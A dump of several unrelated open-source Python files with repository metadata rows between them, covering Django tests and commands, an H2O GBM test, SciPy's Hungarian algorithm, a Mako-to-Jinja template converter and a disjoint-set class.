potato_res, potato_data = self._call(data={'sprout': 'potat-toh'},
anonymous=True)
eq_(tuber_res.status_code, 400)
eq_(potato_res.status_code, 400)
class TestUserAbuseResource(AbuseResourceTests, BaseTestAbuseResource, RestOAuth):
resource_name = 'user'
def setUp(self):
super(TestUserAbuseResource, self).setUp()
self.user = UserProfile.objects.get(pk=2519)
self.default_data = {
'text': '@cvan is very abusive.',
'sprout': 'potato',
'user': self.user.pk
}
def test_invalid_user(self):
res, data = self._call(data={'user': '-1'})
eq_(400, res.status_code)
assert 'Invalid' in data['user'][0]
class TestAppAbuseResource(AbuseResourceTests, BaseTestAbuseResource, RestOAuth):
fixtures = RestOAuth.fixtures + fixture('webapp_337141')
resource_name = 'app'
def setUp(self):
super(TestAppAbuseResource, self).setUp()
self.app = Webapp.objects.get(pk=337141)
self.default_data = {
'text': "@cvan's app is very abusive.",
'sprout': 'potato',
'app': self.app.pk
}
def test_invalid_app(self):
res, data = self._call(data={'app': -1})
eq_(400, res.status_code)
assert 'Invalid' in data['app'][0]
def test_slug_app(self):
res, data = self._call(data={'app': self.app.app_slug})
eq_(201, res.status_code)
| bsd-3-clause | -4,684,766,587,172,379,000 | 30.539007 | 82 | 0.598381 | false |
Mapita/mapita_ci | mapita/mapita_ci/management/commands/syncdb_test.py | 1 | 1989 | from django.conf import settings
from django.core.management.commands import syncdb as django_syncdb
from django.core.management.sql import sql_custom
from django.core.management import call_command
from django.core.management.color import no_style
from django.db import models
from django.db import connections, transaction
#from geojson_rest.sql import *
class Command(django_syncdb.Command):
def handle_noargs(self, **options):
orig_load_initial_data = options.get('load_initial_data')
options['load_initial_data'] = False
super(Command, self).handle_noargs(**options)
db = options.get('database')
connection= connections[db]
# Create customs views for geojson_rest
if 'geojson_rest' in settings.INSTALLED_APPS:
app = models.get_app('geojson_rest')
app_models = models.get_models(app, include_auto_created=True)
tables = connection.introspection.table_names()
converter = connection.introspection.table_name_converter
custom_sql = sql_custom(models.get_app('geojson_rest'), no_style, connection)
#self.stdout.write(custom_sql)
if custom_sql:
cursor = connection.cursor()
try:
for sql in custom_sql:
cursor.execute(sql)
except Exception as e:
self.stdout.write(sql)
self.stderr.write("Failed to install custom SQL for geojson_rest: %s\n" % e)
transaction.rollback_unless_managed(using=db)
else:
transaction.commit_unless_managed(using=db)
# Load initial_data fixtures (unless that has been disabled)
if orig_load_initial_data:
call_command('loaddata', 'initial_data', verbosity=verbosity,
database=db, skip_validation=True) | mit | 5,195,289,300,096,601,000 | 43.222222 | 96 | 0.605832 | false |
ehelms/Opus | opus/lib/prov/deltacloud_old/storage_snapshot.py | 2 | 1554 | ##############################################################################
# Copyright 2010 North Carolina State University #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
##############################################################################
from xml_tools import xml_get_text
class StorageSnapshot(object):
def __init__(self, deltacloud, dom):
self._deltacloud = deltacloud
self.xml = dom.toxml()
self.created = xml_get_text(dom, "created")[0]
self.state = xml_get_text(dom, "state")[0]
#TODO: Storage Volumes
def __repr__(self):
return self.xml
| apache-2.0 | 2,826,304,343,342,828,500 | 52.586207 | 78 | 0.435006 | false |
peter8472/dungeon-run-ls | dungeonrun.py | 1 | 3588 | #! /usr/bin/python
"""Xmlgame: does xmlstuff
jsgame: does js stuff
App: gets clipboard and runs UI
Right now everythign depends on the UI being up and running. This won't always be the case, and isn't necessary.
"""
import Tkinter
import os
import re
from Tkconstants import *
import sys
import json
from xml.dom import minidom
def cb():
u = Tkinter.Tk()
v =u.clipboard_get()
u.destroy()
return v
class badXmlgame():
""" I want to make this inherit from minidom
It's not working yet"""
chars = { "2":"Thorpin", "1":"Featherwell", "3":"Ganelon", "4":"Pippen"}
def __init__(self,parsed_json):
tmp = parsed_json['json']
tmp = tmp['response']
tmp = tmp['properties']
tmp = tmp['value']
self.xml = minidom.parseString(tmp)
def show_size(self):
games = self.xml.getElementsByTagName("game")
for i in games:
charName = self.chars[i.parentNode.getAttribute("charId")]
length = len(i.toxml())
print "%s %d" % (charName, length)
def toxml(self):
return self.xml.toxml()
class Xmlgame():
"""holds the interpreted xml from the json"""
chars = { "2":"Thorpin", "1":"Featherwell", "3":"Ganelon", "4":"Pippen"}
def __init__(self,parsed_json):
tmp = parsed_json['json']
tmp = tmp['response']
tmp = tmp['properties']
tmp = tmp['value']
self.xml = minidom.parseString(tmp)
def getChar(self,name):
"""get a character given the character name.
Not case sensistive"""
mychars = self.xml.getElementsByTagName("data")
for i in mychars:
charnum = i.getAttribute("charId")
charname = Xmlgame.chars[charnum]
if re.match("(?i)%s" %(charname), name):
return i
raise NameError, "%s is not a valid name" % (name)
def show_size(self):
games = self.xml.getElementsByTagName("game")
for i in games:
charName = self.chars[i.parentNode.getAttribute("charId")]
length = len(i.toxml())
print "%s %d" % (charName, length)
def toxml(self):
return self.xml.toxml()
class App:
def __init__(self, master):
self.master = master # This is not legitimate use of "master"
cbstats = "Get Stats from the clipboard"
frame = Tkinter.Frame(master, relief = RIDGE, borderwidth=2)
frame.pack(fill = BOTH, expand=1)
label = Tkinter.Label(frame, text="hello world")
label.pack(fill=X, expand=1)
button = Tkinter.Button( frame, text="exit", command=u.destroy)
button2 = Tkinter.Button( frame, text="hello", command=self.say_hi)
button.pack(side=BOTTOM)
button2.pack(side=BOTTOM)
button3 = Tkinter.Button( frame, text=cbstats, command=self.blah)
button3.pack(side=RIGHT)
def blah(self):
tmp = self.master.clipboard_get()
print "size is %d" % (len(tmp))
g = json.loads(tmp)
game = Xmlgame(g)
game.show_size()
# print game.toxml()
def say_hi(self):
print "hi there"
def savecb(filename):
stuff = cb()
if os.path.exists(filename):
raise NameError, "file exists"
with open(filename,'w') as f:
f.write(stuff)
def getcb():
stuff = cb()
js = json.loads(stuff)
return Xmlgame(js)
def getfile(fname):
with open(fname) as infile:
js = json.load(infile)
return Xmlgame(js)
if __name__ == "__main__":
if len(sys.argv) != 2:
print "usage: %s <filename>"
u = Tkinter.Tk()
app = App(u)
u.mainloop()
exit(1)
with open(sys.argv[1]) as f:
tmp = f.read()
parsed_json = json.loads(tmp)
print "Total length %d" % ( len(tmp))
blah = Xmlgame(parsed_json)
blah.show_size()
| apache-2.0 | 1,777,711,092,362,866,000 | 25.977444 | 113 | 0.625418 | false |
hanteng/pyCountryGroup | pyCountryGroup/data/__init__.py | 1 | 2056 | # -*- coding: utf-8 -*-
#歧視無邊,回頭是岸。鍵起鍵落,情真情幻。
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import pandas as pd
import os
__all__ = ["iso","iso2","ison","wb_cname","un_cname",\
"wb_r_long","un_r_long", "un_r_long_detail", "wb_region", "un_region",\
"wb_i_long","wb_incomelevel","beltroad","beltroad_region","meta","wp"]
__all__ = [str(u) for u in __all__]
_ROOT = os.path.abspath(os.path.dirname(__file__))
from os.path import basename, join, splitext
wp=pd.read_pickle(os.path.join(_ROOT, "cat.pkl"))
iso=wp['Unicode_UN'].index
iso2=wp['Unicode_UN']['countrycode2']
ison=wp['Unicode_UN']['numeric']
wb_cname=wp['worldbank']['countryname']
un_cname=wp['Unicode_UN']['countryname']
wb_r_long=wp['worldbank']['r_long']
un_r_long=wp['Unicode_UN']['r_long'] #UN region just under the world
un_r_long_detail=wp['Unicode_UN']['r_long_d']
cia_r_long=wp['CIA']['r_long']
wb_region=wp['worldbank']['region']
un_region=wp['Unicode_UN']['region']
cia_region=wp['CIA']['region']
wb_i_long=wp['worldbank']['i_long']
wb_incomelevel=wp['worldbank']['incomelevel']
beltroad = wp["BeltRoad"]["inBeltRoad"]
beltroad_region = wp["BeltRoad"]["inBeltRoad_region"]
meta={'iso': "Country Code (ISO 3166-1 alpha-3)",\
'iso2': "Country Code (ISO 3166-1 alpha-2)",\
'ison': "Country Code (ISO 3166-1 numeric-3)",\
'wb_cname': "Country Name (World Bank)",\
'un_cname': "Country Name (Unicode)",\
'wb_r_long': "Geographic Categorization (World Bank)",\
'un_r_long': "Geographic Categorization (Unicode)",\
'wb_region': "Geographic Categorization Code (World Bank)",\
'un_region': "Geographic Categorization Code (UN)",\
'wb_i_long': "Income Level (World Bank)", \
'wb_incomelevel': "Income Level Code (World Bank)", \
'beltroad': "Part of China’s Belt and Road Initiative (HKTDC)", \
'beltroad_region': "Regions of China’s Belt and Road Initiative (HKTDC)", \
}
| gpl-3.0 | 4,161,789,342,414,068,000 | 36.962264 | 82 | 0.629225 | false |
malaonline/Server | server/app/migrations/0161_schoolmaster.py | 1 | 1028 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-09-05 08:50
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('app', '0160_policy'),
]
operations = [
migrations.CreateModel(
name='SchoolMaster',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('school', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='app.School')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
]
| mit | -7,709,143,905,819,381,000 | 33.266667 | 132 | 0.603113 | false |
pchmieli/h2o-3 | h2o-py/tests/testdir_algos/gbm/pyunit_DEPRECATED_offset_gaussianGBM.py | 1 | 1830 | import sys
sys.path.insert(1,"../../../")
import h2o
from tests import pyunit_utils
def offset_gaussian():
# Connect to a pre-existing cluster
insurance = h2o.import_file(pyunit_utils.locate("smalldata/glm_test/insurance.csv"))
insurance["offset"] = insurance["Holders"].log()
gbm = h2o.gbm(x=insurance[0:3], y=insurance["Claims"], distribution="gaussian", ntrees=600, max_depth=1, min_rows=1,
learn_rate=.1, offset_column="offset", training_frame=insurance)
predictions = gbm.predict(insurance)
# Comparison result generated from R's gbm:
# fit2 <- gbm(Claims ~ District + Group + Age+ offset(log(Holders)) , interaction.depth = 1,n.minobsinnode = 1,
# shrinkage = .1,bag.fraction = 1,train.fraction = 1,
# data = Insurance, distribution ="gaussian", n.trees = 600)
# pg = predict(fit2, newdata = Insurance, type = "response", n.trees=600)
# pr = pg - - log(Insurance$Holders)
assert abs(44.33016 - gbm._model_json['output']['init_f']) < 1e-5, "expected init_f to be {0}, but got {1}". \
format(44.33016, gbm._model_json['output']['init_f'])
assert abs(1491.135 - gbm.mse()) < 1e-2, "expected mse to be {0}, but got {1}".format(1491.135, gbm.mse())
assert abs(49.23438 - predictions.mean()) < 1e-2, "expected prediction mean to be {0}, but got {1}". \
format(49.23438, predictions.mean())
assert abs(-45.5720659304 - predictions.min()) < 1e-2, "expected prediction min to be {0}, but got {1}". \
format(-45.5720659304, predictions.min())
assert abs(207.387 - predictions.max()) < 1e-2, "expected prediction max to be {0}, but got {1}". \
format(207.387, predictions.max())
if __name__ == "__main__":
pyunit_utils.standalone_test(offset_gaussian)
else:
offset_gaussian()
| apache-2.0 | -8,684,211,034,897,369,000 | 41.55814 | 120 | 0.631148 | false |
amjames/psi4 | psi4/driver/qcdb/util/scipy_hungarian.py | 1 | 10333 | # [Apr 2018] stolen directly from scipy so I can get an array back
# https://github.com/scipy/scipy/blob/master/scipy/optimize/_hungarian.py
# Hungarian algorithm (Kuhn-Munkres) for solving the linear sum assignment
# problem. Taken from scikit-learn. Based on original code by Brian Clapper,
# adapted to NumPy by Gael Varoquaux.
# Further improvements by Ben Root, Vlad Niculae and Lars Buitinck.
#
# Copyright (c) 2008 Brian M. Clapper <[email protected]>, Gael Varoquaux
# Author: Brian M. Clapper, Gael Varoquaux
# License: 3-clause BSD
import numpy as np
def linear_sum_assignment(cost_matrix, return_cost=False):
"""Solve the linear sum assignment problem.
The linear sum assignment problem is also known as minimum weight matching
in bipartite graphs. A problem instance is described by a matrix C, where
each C[i,j] is the cost of matching vertex i of the first partite set
(a "worker") and vertex j of the second set (a "job"). The goal is to find
a complete assignment of workers to jobs of minimal cost.
Formally, let X be a boolean matrix where :math:`X[i,j] = 1` iff row i is
assigned to column j. Then the optimal assignment has cost
.. math::
\\min \\sum_i \\sum_j C_{i,j} X_{i,j}
s.t. each row is assignment to at most one column, and each column to at
most one row.
This function can also solve a generalization of the classic assignment
problem where the cost matrix is rectangular. If it has more rows than
columns, then not every row needs to be assigned to a column, and vice
versa.
The method used is the Hungarian algorithm, also known as the Munkres or
Kuhn-Munkres algorithm.
Parameters
----------
cost_matrix : array
The cost matrix of the bipartite graph.
return_cost : bool, optional
If True, also return a copy of the cost_matrix reduced to maximal
zeros at the end of the Munkres algorithm.
Returns
-------
row_ind, col_ind : array
An array of row indices and one of corresponding column indices giving
the optimal assignment. The cost of the assignment can be computed
as ``cost_matrix[row_ind, col_ind].sum()``. The row indices will be
sorted; in the case of a square cost matrix they will be equal to
``numpy.arange(cost_matrix.shape[0])``.
(row_ind, col_ind), cost
Only provided if `return_cost` is True.
Notes
-----
.. versionadded:: 0.17.0
Examples
--------
>>> cost = np.array([[4, 1, 3], [2, 0, 5], [3, 2, 2]])
>>> from scipy.optimize import linear_sum_assignment
>>> row_ind, col_ind = linear_sum_assignment(cost)
>>> col_ind
array([1, 0, 2])
>>> cost[row_ind, col_ind].sum()
5
References
----------
1. http://csclab.murraystate.edu/bob.pilgrim/445/munkres.html
2. Harold W. Kuhn. The Hungarian Method for the assignment problem.
*Naval Research Logistics Quarterly*, 2:83-97, 1955.
3. Harold W. Kuhn. Variants of the Hungarian method for assignment
problems. *Naval Research Logistics Quarterly*, 3: 253-258, 1956.
4. Munkres, J. Algorithms for the Assignment and Transportation Problems.
*J. SIAM*, 5(1):32-38, March, 1957.
5. https://en.wikipedia.org/wiki/Hungarian_algorithm
"""
cost_matrix = np.asarray(cost_matrix)
if len(cost_matrix.shape) != 2:
raise ValueError("expected a matrix (2-d array), got a %r array"
% (cost_matrix.shape,))
if not (np.issubdtype(cost_matrix.dtype, np.number) or
cost_matrix.dtype == np.dtype(np.bool)):
raise ValueError("expected a matrix containing numerical entries, got %s"
% (cost_matrix.dtype,))
if np.any(np.isinf(cost_matrix) | np.isnan(cost_matrix)):
raise ValueError("matrix contains invalid numeric entries")
if cost_matrix.dtype == np.dtype(np.bool):
cost_matrix = cost_matrix.astype(np.int)
# The algorithm expects more columns than rows in the cost matrix.
if cost_matrix.shape[1] < cost_matrix.shape[0]:
cost_matrix = cost_matrix.T
transposed = True
else:
transposed = False
state = _Hungary(cost_matrix)
# No need to bother with assignments if one of the dimensions
# of the cost matrix is zero-length.
step = None if 0 in cost_matrix.shape else _step1
while step is not None:
step = step(state)
if transposed:
marked = state.marked.T
else:
marked = state.marked
if return_cost:
return np.where(marked == 1), state.C
else:
return np.where(marked == 1)
class _Hungary(object):
"""State of the Hungarian algorithm.
Parameters
----------
cost_matrix : 2D matrix
The cost matrix. Must have shape[1] >= shape[0].
"""
def __init__(self, cost_matrix):
self.C = cost_matrix.copy()
n, m = self.C.shape
self.row_uncovered = np.ones(n, dtype=bool)
self.col_uncovered = np.ones(m, dtype=bool)
self.Z0_r = 0
self.Z0_c = 0
self.path = np.zeros((n + m, 2), dtype=int)
self.marked = np.zeros((n, m), dtype=int)
def _clear_covers(self):
"""Clear all covered matrix cells"""
self.row_uncovered[:] = True
self.col_uncovered[:] = True
# Individual steps of the algorithm follow, as a state machine: they return
# the next step to be taken (function to be called), if any.
def _step1(state):
"""Steps 1 and 2 in the Wikipedia page."""
# Step 1: For each row of the matrix, find the smallest element and
# subtract it from every element in its row.
state.C -= state.C.min(axis=1)[:, np.newaxis]
# Step 2: Find a zero (Z) in the resulting matrix. If there is no
# starred zero in its row or column, star Z. Repeat for each element
# in the matrix.
for i, j in zip(*np.where(state.C == 0)):
if state.col_uncovered[j] and state.row_uncovered[i]:
state.marked[i, j] = 1
state.col_uncovered[j] = False
state.row_uncovered[i] = False
state._clear_covers()
return _step3
def _step3(state):
"""
Cover each column containing a starred zero. If n columns are covered,
the starred zeros describe a complete set of unique assignments.
In this case, Go to DONE, otherwise, Go to Step 4.
"""
marked = (state.marked == 1)
state.col_uncovered[np.any(marked, axis=0)] = False
if marked.sum() < state.C.shape[0]:
return _step4
def _step4(state):
"""
Find a noncovered zero and prime it. If there is no starred zero
in the row containing this primed zero, Go to Step 5. Otherwise,
cover this row and uncover the column containing the starred
zero. Continue in this manner until there are no uncovered zeros
left. Save the smallest uncovered value and Go to Step 6.
"""
# We convert to int as numpy operations are faster on int
C = (state.C == 0).astype(int)
covered_C = C * state.row_uncovered[:, np.newaxis]
covered_C *= np.asarray(state.col_uncovered, dtype=int)
n = state.C.shape[0]
m = state.C.shape[1]
while True:
# Find an uncovered zero
row, col = np.unravel_index(np.argmax(covered_C), (n, m))
if covered_C[row, col] == 0:
return _step6
else:
state.marked[row, col] = 2
# Find the first starred element in the row
star_col = np.argmax(state.marked[row] == 1)
if state.marked[row, star_col] != 1:
# Could not find one
state.Z0_r = row
state.Z0_c = col
return _step5
else:
col = star_col
state.row_uncovered[row] = False
state.col_uncovered[col] = True
covered_C[:, col] = C[:, col] * (
np.asarray(state.row_uncovered, dtype=int))
covered_C[row] = 0
def _step5(state):
"""
Construct a series of alternating primed and starred zeros as follows.
Let Z0 represent the uncovered primed zero found in Step 4.
Let Z1 denote the starred zero in the column of Z0 (if any).
Let Z2 denote the primed zero in the row of Z1 (there will always be one).
Continue until the series terminates at a primed zero that has no starred
zero in its column. Unstar each starred zero of the series, star each
primed zero of the series, erase all primes and uncover every line in the
matrix. Return to Step 3
"""
count = 0
path = state.path
path[count, 0] = state.Z0_r
path[count, 1] = state.Z0_c
while True:
# Find the first starred element in the col defined by
# the path.
row = np.argmax(state.marked[:, path[count, 1]] == 1)
if state.marked[row, path[count, 1]] != 1:
# Could not find one
break
else:
count += 1
path[count, 0] = row
path[count, 1] = path[count - 1, 1]
# Find the first prime element in the row defined by the
# first path step
col = np.argmax(state.marked[path[count, 0]] == 2)
if state.marked[row, col] != 2:
col = -1
count += 1
path[count, 0] = path[count - 1, 0]
path[count, 1] = col
# Convert paths
for i in range(count + 1):
if state.marked[path[i, 0], path[i, 1]] == 1:
state.marked[path[i, 0], path[i, 1]] = 0
else:
state.marked[path[i, 0], path[i, 1]] = 1
state._clear_covers()
# Erase all prime markings
state.marked[state.marked == 2] = 0
return _step3
def _step6(state):
"""
Add the value found in Step 4 to every element of each covered row,
and subtract it from every element of each uncovered column.
Return to Step 4 without altering any stars, primes, or covered lines.
"""
# the smallest uncovered value in the matrix
if np.any(state.row_uncovered) and np.any(state.col_uncovered):
minval = np.min(state.C[state.row_uncovered], axis=0)
minval = np.min(minval[state.col_uncovered])
state.C[~state.row_uncovered] += minval
state.C[:, state.col_uncovered] -= minval
return _step4
| lgpl-3.0 | -293,536,159,332,678,000 | 34.146259 | 81 | 0.618988 | false |
xuhdev/nikola | scripts/jinjify.py | 1 | 9689 | #!/usr/bin/env python
"""Script to convert templates from Mako to Jinja2."""
import io
import glob
import sys
import os
import re
import json
import shutil
import tempfile
import colorama
import jinja2
dumb_replacements = [
["{% if any(post.is_mathjax for post in posts) %}", '{% if posts|selectattr("is_mathjax")|list %}'],
["json.dumps(title)", "title|tojson"],
["{{ parent.extra_head() }}", "{{ super() }}"],
["{{ parent.content() }}", "{{ super() }}"],
["prefix='\\", "prefix='"],
["og: http://ogp.me/ns# \\", "og: http://ogp.me/ns#"],
["article: http://ogp.me/ns/article# \\", "article: http://ogp.me/ns/article#"],
["fb: http://ogp.me/ns/fb# \\", "fb: http://ogp.me/ns/fb#"],
['dir="rtl" \\', 'dir="rtl"'],
['sorted(translations)', 'translations|sort'],
]
dumber_replacements = [
['<%! import json %>\n\n', ''],
["<html\n\\", "<html\n"],
["\n'\\\n", "\n'\n"],
["{% endif %}\n\\", "{% endif %}\n"]
]
def jinjify(in_theme, out_theme):
"""Convert in_theme into a jinja version and put it in out_theme"""
in_templates_path = os.path.join(in_theme, "templates")
out_templates_path = os.path.join(out_theme, "templates")
try:
os.makedirs(out_templates_path)
except:
pass
lookup = jinja2.Environment()
lookup.filters['tojson'] = json.dumps
lookup.loader = jinja2.FileSystemLoader([out_templates_path], encoding='utf-8')
for template in glob.glob(os.path.join(in_templates_path, "*.tmpl")):
out_template = os.path.join(out_templates_path, os.path.basename(template))
with io.open(template, "r", encoding="utf-8") as inf:
data = mako2jinja(inf)
lines = []
for line in data.splitlines():
for repl in dumb_replacements:
line = line.replace(*repl)
lines.append(line)
data = '\n'.join(lines)
for repl in dumber_replacements:
data = data.replace(*repl)
with io.open(out_template, "w+", encoding="utf-8") as outf:
outf.write(data + '\n')
# Syntax check output
source, filename = lookup.loader.get_source(lookup, os.path.basename(template))[:2]
try:
lookup.parse(source)
except Exception as e:
error("Syntax error in {0}:{1}".format(out_template, e.lineno))
parent = os.path.basename(in_theme.rstrip('/'))
child = os.path.basename(out_theme.rstrip('/'))
mappings = {
'base-jinja': 'base',
'bootstrap3-jinja': 'base-jinja',
}
if child in mappings:
parent = mappings[child]
# Copy assets in bootstrap/bootstrap3
if child == 'bootstrap3-jinja':
assets_dir = os.path.join(out_theme, "assets")
if os.path.exists(assets_dir):
shutil.rmtree(assets_dir)
shutil.copytree(
os.path.join(in_theme, "assets"), os.path.join(out_theme, "assets"),
symlinks=True)
# Copy bundles
# shutil.copy(os.path.join(in_theme, "bundles"), os.path.join(out_theme, "bundles"))
# Copy README
if os.path.isfile(os.path.join(in_theme, "README.md")):
shutil.copy(os.path.join(in_theme, "README.md"), os.path.join(out_theme, "README.md"))
def error(msg):
print(colorama.Fore.RED + "ERROR:" + msg + colorama.Fore.RESET)
def mako2jinja(input_file):
output = ''
# TODO: OMG, this code is so horrible. Look at it; just look at it:
macro_start = re.compile(r'(.*)<%\s*def name="([^"]*?)"\s*>(.*)', re.IGNORECASE)
macro_end = re.compile(r'(.*)</%def>(.*)', re.IGNORECASE)
if_start = re.compile(r'(.*)% *if (.*):(.*)', re.IGNORECASE)
if_else = re.compile(r'(.*)% *else.*:(.*)', re.IGNORECASE)
if_elif = re.compile(r'(.*)% *elif (.*):(.*)', re.IGNORECASE)
if_end = re.compile(r'(.*)% *endif(.*)', re.IGNORECASE)
for_start = re.compile(r'(.*)% *for (.*):(.*)', re.IGNORECASE)
for_end = re.compile(r'(.*)% *endfor(.*)', re.IGNORECASE)
namespace = re.compile(r'(.*)<% *namespace name="(.*?)".* file="(.*?)".*/>(.*)', re.IGNORECASE)
inherit = re.compile(r'(.*)<% *inherit file="(.*?)".*/>(.*)', re.IGNORECASE)
block_single_line = re.compile(r'(.*)<% *block.*name="(.*?)".*>(.*)</% *block>(.*)', re.IGNORECASE)
block_start = re.compile(r'(.*)<% *block.*name="(.*?)".*>(.*)', re.IGNORECASE)
block_end = re.compile(r'(.*)</%block>(.*)', re.IGNORECASE)
val = re.compile(r'\$\{(.*?)\}', re.IGNORECASE)
func_len = re.compile(r'len\((.*?)\)', re.IGNORECASE)
filter_h = re.compile(r'\|h', re.IGNORECASE)
filter_striphtml = re.compile(r'\|striphtml', re.IGNORECASE)
filter_u = re.compile(r'\|u', re.IGNORECASE)
comment_single_line = re.compile(r'^.*##(.*?)$', re.IGNORECASE)
for line in input_file:
# Process line for repeated inline replacements
m_val = val.search(line)
m_func_len = func_len.search(line)
m_filter_h = filter_h.search(line)
m_filter_striphtml = filter_striphtml.search(line)
m_filter_u = filter_u.search(line)
if m_val:
line = val.sub(r'{{ \1 }}', line)
if m_filter_h:
line = filter_h.sub(r'|e', line)
if m_filter_striphtml:
line = filter_striphtml.sub(r'|e', line)
if m_filter_u:
line = filter_u.sub(r'|urlencode', line)
if m_func_len:
line = func_len.sub(r'\1|length', line)
# Macro start/end
m_macro_start = macro_start.search(line)
if m_macro_start:
line = m_macro_start.expand(r'\1{% macro \2 %}\3') + '\n'
m_macro_end = macro_end.search(line)
if m_macro_end:
line = m_macro_end.expand(r'\1{% endmacro %}\2') + '\n'
# Process line for single 'whole line' replacements
m_macro_start = macro_start.search(line)
m_macro_end = macro_end.search(line)
m_if_start = if_start.search(line)
m_if_else = if_else.search(line)
m_if_elif = if_elif.search(line)
m_if_end = if_end.search(line)
m_for_start = for_start.search(line)
m_for_end = for_end.search(line)
m_namspace = namespace.search(line)
m_inherit = inherit.search(line)
m_block_single_line = block_single_line.search(line)
m_block_start = block_start.search(line)
m_block_end = block_end.search(line)
m_comment_single_line = comment_single_line.search(line)
if m_comment_single_line:
output += m_comment_single_line.expand(r'{# \1 #}') + '\n'
elif m_if_start:
output += m_if_start.expand(r'\1{% if \2 %}\3') + '\n'
elif m_if_else:
output += m_if_else.expand(r'\1{% else %}\2') + '\n'
elif m_if_elif:
output += m_if_elif.expand(r'\1{% elif \2 %}\3') + '\n'
elif m_if_end:
output += m_if_end.expand(r'\1{% endif %}\2') + '\n'
elif m_for_start:
output += m_for_start.expand(r'\1{% for \2 %}\3') + '\n'
elif m_for_end:
output += m_for_end.expand(r'\1{% endfor %}\2') + '\n'
elif m_namspace:
output += m_namspace.expand(r"\1{% import '\3' as \2 with context %}\4") + '\n'
elif m_inherit:
output += m_inherit.expand(r"{% extends '\2' %}\3") + '\n'
elif m_block_single_line:
output += m_block_single_line.expand(r'\1{% block \2 %}\3{% endblock %}\4') + '\n'
elif m_block_start:
output += m_block_start.expand(r'\1{% block \2 %}\3') + '\n'
elif m_block_end:
output += m_block_end.expand(r'\1{% endblock %}\2') + '\n'
else:
# Doesn't match anything we're going to process, pass though
output += line
return output
def jinjify_shortcodes(in_dir, out_dir):
for fname in os.listdir(in_dir):
if not fname.endswith('.tmpl'):
continue
in_file = os.path.join(in_dir, fname)
out_file = os.path.join(out_dir, fname)
with open(in_file) as inf:
data = mako2jinja(inf)
with open(out_file, 'w') as outf:
outf.write(data)
def usage():
print("Usage: python {} [in-dir] [out-dir]".format(sys.argv[0]))
print("OR")
print("Usage: python {} [in-file] [out-file]".format(sys.argv[0]))
if __name__ == "__main__":
if len(sys.argv) == 1:
print('Performing standard conversions:')
for m, j in (
('nikola/data/themes/base', 'nikola/data/themes/base-jinja'),
('nikola/data/themes/bootstrap3', 'nikola/data/themes/bootstrap3-jinja')
):
print(' {0} -> {1}'.format(m, j))
jinjify(m, j)
jinjify_shortcodes('nikola/data/shortcodes/mako', 'nikola/data/shortcodes/jinja')
elif len(sys.argv) != 3:
print('ERROR: needs input and output directory (file), or no arguments for default conversions.')
usage()
elif os.path.isdir(sys.argv[1]) and (os.path.isdir(sys.argv[2]) or not os.path.exists(sys.argv[2])):
jinjify(sys.argv[1], sys.argv[2])
elif os.path.isfile(sys.argv[1]) and (os.path.isfile(sys.argv[2]) or not os.path.exists(sys.argv[2])):
tmpdir = tempfile.mkdtemp()
indir = os.path.sep.join((tmpdir, 'in', 'templates'))
outdir = os.path.sep.join((tmpdir, 'out', 'templates'))
os.makedirs(indir)
shutil.copy(sys.argv[1], indir)
jinjify(os.path.dirname(indir), os.path.dirname(outdir))
shutil.move(os.path.sep.join((outdir, os.path.basename(sys.argv[1]))), sys.argv[2])
else:
print('ERROR: the two arguments must be both directories or files')
usage()
| mit | -3,567,311,414,146,262,500 | 35.700758 | 106 | 0.558056 | false |
aryrobocode/apothecary | apothecary/cs/ds/disjoint_set.py | 1 | 4291 | class DJset:
def __init__(self, size, start = 0):
"""
Creates a new disjoint set data structure
Args:
start: The starting index for all elements (e.g. 0 or 1)
size: The number of elements to be considered (i.e. last index)
Operations:
find: Finds the representative of the group the element belongs to
union: Merge 2 elements into a single group
group_size: Computes size of a group
group: Finds all elements in a group
rep: Find the representatives of all disjoint sets
"""
self.parent = [None] * (size + 1)
self.size = [None] * (size + 1) # Double as rank of an element
self.start = start
self.end = size
for i in range(self.end + 1):
self._init(i)
def _init(self, element):
self.parent[element] = element
self.size[element] = 1
def _oor(self, element):
return element < self.start or element > self.end
def find(self, element, visual = False, visual_string="Finding:\t"):
"""
Finds the representative of the group an element is in
Args:
element: Index of an element in the disjoint set
visual: Set to True for additional screen output
Returns:
Index of representative of group, -1 if not found (e.g. out of range)
Time:
O(1) [Amortized]
Explanation:
Recursively find representative with path compression
"""
if self._oor(element):
return -1
if self.parent[element] == element:
if visual:
print(visual_string + "{} [Found]".format(element))
return element
else:
if visual:
visual_string += "{} --> ".format(element)
self.parent[element] = self.find(self.parent[element], visual, visual_string)
return self.parent[element]
def group_size(self, element, visual = False):
"""
Finds the size of the group an element is in
Args:
element: Index of an element in the disjoint set
visual: Set to True for additional screen output
Returns:
Size of group element is in , -1 if not found (e.g. out of range)
Time:
O(1) [Amortized]
"""
if self._oor(element):
return -1
return self.size[self.find(element)]
def group(self, element, visual = False):
"""
Finds all group members of the group an element is in
Args:
element: Index of an element in the disjoint set
visual: Set to True for additional screen output
Returns:
A list of all group members, -1 if none found (e.g. out of range)
Time:
O(n)
Explanation:
Check each element to see if they share the same representative
"""
if self._oor(element):
return -1
result, parent = [], self.find(element)
for i in range(self.start, self.end + 1):
if self.find(i) == parent:
result.append(i)
if visual:
print("Group containing {}: {}".format(element, result))
return result
def rep(self, visual = False):
"""
Finds all representatives of the disjoint set
Args:
visual: Set to True for additional screen output
Returns:
A list of all representatives, -1 if not found (e.g. out of range)
Time:
O(n)
Explanation:
Find all elements who represent themselves
"""
result = []
for i in range(self.start, self.end + 1):
if self.find(i) == i:
if visual:
print("[{}, Size {}]".format(i, self.group_size(i)))
result.append(i)
return result
